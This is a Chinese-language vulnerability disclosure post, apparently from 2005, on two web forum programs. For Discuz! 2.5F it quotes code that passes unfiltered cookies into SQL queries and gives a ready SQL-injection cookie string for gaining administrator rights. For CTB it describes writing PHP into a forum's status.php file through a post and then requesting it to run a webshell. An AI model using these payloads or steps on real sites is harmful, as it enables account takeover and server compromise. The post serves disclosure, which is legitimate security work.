火狐技术联盟发现的两款论坛程序漏洞
漏洞说明:
Discuz! 2.5F新版论坛 COOKIE未过滤 通过本地构造可获取管理员权限具体描述:
文件include\common.php中87行
=================================code begin==========================================================
$discuz_uid = $_COOKIE['_discuz_uid']; //这里没有进行过滤检测
$discuz_pw = $_COOKIE['_discuz_pw'];
$discuz_secques = $_COOKIE['_discuz_secques'];
$newpm = $newpmexists = $sessionexists = $adminid = $adminglobal = 0;
$userinfo="m.uid AS discuz_uid, m.username AS discuz_user, m.password AS discuz_pw, m.adminid, m.groupid, m.email, m.timeoffset,m.tpp, m.ppp, m.credit, m.timeformat, m.dateformat, m.signature, m.invisible, m.lastvisit, m.lastpost, m.newpm, m.accessmasks, m.regdate";
//这里直接就放入mysql执行了..
if($sid) {
if($discuz_uid) {
$query = $db->query("SELECT s.sid, s.styleid, s.groupid='6' AS ipbanned, $userinfo FROM $table_sessions s, $table_members m WHERE m.uid=s.uid AND s.sid='$sid' AND CONCAT_WS('.',s.ip1,s.ip2,s.ip3,s.ip4)='$onlineip' AND m.uid='$discuz_uid' AND m.password='$discuz_pw' AND m.secques='$discuz_secques'");
} else {
$query = $db->query("SELECT sid, uid AS sessionuid, groupid, groupid='6' AS ipbanned, styleid FROM $table_sessions WHERE sid='$sid' AND CONCAT_WS('.',ip1,ip2,ip3,ip4)='$onlineip'");
}
if($_DSESSION = $db->fetch_array($query)) {
$sessionexists = 1;
if(!empty($_DSESSION['sessionuid'])) {
$query = $db->query("SELECT $userinfo FROM $table_members m WHERE uid='$_DSESSION[sessionuid]'");
$_DSESSION = array_merge($_DSESSION, $db->fetch_array($query));
}
} else {
$query = $db->query("SELECT sid, groupid, groupid='6' AS ipbanned, styleid FROM $table_sessions WHERE sid='$sid' AND CONCAT_WS('.',ip1,ip2,ip3,ip4)='$onlineip'");
if($_DSESSION = $db->fetch_array($query)) {
clearcookies();
$sessionexists = 1;
}
}
}
if(!$sessionexists) {
..........................................
====================================code end==========================================================
本地cookie构造方式:
sid=dAgM7P; _cookietime=2592000; expand_menu=0__3; _discuz_uid=1' or '1'='1' /*; _discuz_pw=wofeiwo; _discuz_secques=hehe
漏洞演示动画下载:
http://hackbase.com/62/20050203/6111.htm
2.CTB漏洞终结篇
漏洞发现:火狐技术联盟-Saiy [www.wrsky.com]
漏洞说明:
CTB读用户资料和发贴时候未经过数据过滤.....导致黑客可以有可能写入webshell导致服务器的破坏,(我晕,我最后一次拿我51的空间做动画了,好开心好感动...55555555)...
具体描述:
mods/post.php (在网吧读的,多少行,我还真不知道。)
$this->file = $this->set['dataPath']."/".$this->input['forumid']."/status.php";
@$line = $this->get();
*************************************************************
这是从一月开始,我们火狐(http://www.wrsky.com)发现的第三个关于BBS程序的致命漏洞,从ofstar到我非我发现discuz!2.5F到这次的CTB。
也是某鱼我最后一次在无盘系统网吧写文字部分和做动画,在新的一年,希望大家都可以更加进步也更加开心。
*************************************************************
漏洞存在环境:
目前最新的CTB和以前的CTB。
前提:某一版块从来没有删除过贴子。
检验方式:提交http://论坛地址/data/1/status.php
其中1为版块1
进入版块为:http://论坛地址/index.php?mods=forumdisplay&forumid=1
最后的一代表为版块1,对应文件为http://论坛地址/data/1/status.php
以次类推......
*************************************************************
利用方式:发贴,在主题写php脚本,访问http://论坛地址/data/存在问题的版块/status.php
推荐
评论(0条)
